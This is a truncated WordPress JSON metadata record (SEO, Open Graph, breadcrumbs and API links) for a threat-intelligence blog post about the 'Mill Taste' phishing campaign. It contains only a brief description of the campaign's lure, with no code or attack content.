\u201cMelissa","inLanguage":"en-US","isPartOf":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/#website"},"breadcrumb":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#breadcrumblist"},"author":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/author\/neffie\/#author"},"creator":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/author\/neffie\/#author"},"image":{"@type":"ImageObject","url":"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/06\/GlobalConnections-RightSize.jpg","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#mainImage","width":1680,"height":836},"primaryImageOfPage":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#mainImage"},"datePublished":"2019-10-28T00:00:00+00:00","dateModified":"2024-06-23T23:06:27+00:00"},{"@type":"WebSite","@id":"https:\/\/cyberthreatintelligencenetwork.com\/#website","url":"https:\/\/cyberthreatintelligencenetwork.com\/","name":"Training Center","description":"Cybersecurity Center","inLanguage":"en-US","publisher":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/#organization"}}]},"og:locale":"en_US","og:site_name":"CTIN - Cybersecurity Center","og:type":"article","og:title":"The \u201cMill Taste\u201d Campaign - CTIN","og:description":"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa","og:url":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/","og:image":"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/05\/SocialShare-Image.png","og:image:secure_url":"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/05\/SocialShare-Image.png","og:image:width":112,"og:image:height":112,"article:published_time":"2019-10-28T00:00:00+00:00","article:modified_time":"2024-06-23T23:06:27+00:00","article:publisher":"https:\/\/www.facebook.com\/CyberThreatIntelligenceNetwork\/","twitter:card":"summary","twitter:site":"@CTIN_Global","twitter:title":"The \u201cMill Taste\u201d Campaign - CTIN","twitter:description":"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa","twitter:creator":"@CTIN_Global","twitter:image":"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/05\/SocialShare-Image.png"},"aioseo_meta_data":{"post_id":"341","title":null,"description":null,"keywords":null,"keyphrases":{"focus":{"keyphrase":"","score":0,"analysis":{"keyphraseInTitle":{"score":0,"maxScore":9,"error":1}}},"additional":[]},"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":"","og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"BlogPosting","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":"-1","robots_max_videopreview":"-1","robots_max_imagepreview":"large","priority":null,"frequency":"default","local_seo":null,"seo_analyzer_scan_date":"2025-08-25 22:41:07","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"open_ai":"{\"title\":{\"suggestions\":[],\"usage\":0},\"description\":{\"suggestions\":[],\"usage\":0}}","ai":null,"created":"2021-08-07 21:55:02","updated":"2025-08-25 22:41:07"},"aioseo_breadcrumb":"<div class=\"aioseo-breadcrumbs\"><span class=\"aioseo-breadcrumb\">\n\t<a href=\"https:\/\/cyberthreatintelligencenetwork.com\" title=\"Home\">Home<\/a>\n<\/span><span class=\"aioseo-breadcrumb-separator\">\u00bb<\/span><span class=\"aioseo-breadcrumb\">\n\t<a href=\"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/blog\/posts\/\" title=\"Posts\">Posts<\/a>\n<\/span><span class=\"aioseo-breadcrumb-separator\">\u00bb<\/span><span class=\"aioseo-breadcrumb\">\n\t<a href=\"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/\" title=\"COTH\">COTH<\/a>\n<\/span><span class=\"aioseo-breadcrumb-separator\">\u00bb<\/span><span class=\"aioseo-breadcrumb\">\n\t<a href=\"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/malware\/\" title=\"Malware\">Malware<\/a>\n<\/span><span class=\"aioseo-breadcrumb-separator\">\u00bb<\/span><span class=\"aioseo-breadcrumb\">\n\tThe \u201cMill Taste\u201d Campaign\n<\/span><\/div>","aioseo_breadcrumb_json":[{"label":"Home","link":"https:\/\/cyberthreatintelligencenetwork.com"},{"label":"Posts","link":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/blog\/posts\/"},{"label":"COTH","link":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/"},{"label":"Malware","link":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/malware\/"},{"label":"The &#8220;Mill Taste&#8221; Campaign","link":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/"}],"amp_enabled":false,"_links":{"self":[{"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/posts\/341","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/comments?post=341"}],"version-history":[{"count":7,"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/posts\/341\/revisions"}],"predecessor-version":[{"id":4428,"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/posts\/341\/revisions\/4428"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/media\/4265"}],"wp:attachment":[{"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/media?parent=341"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/categories?post=341"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/wp-json\/wp\/v2\/tags?post=341"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}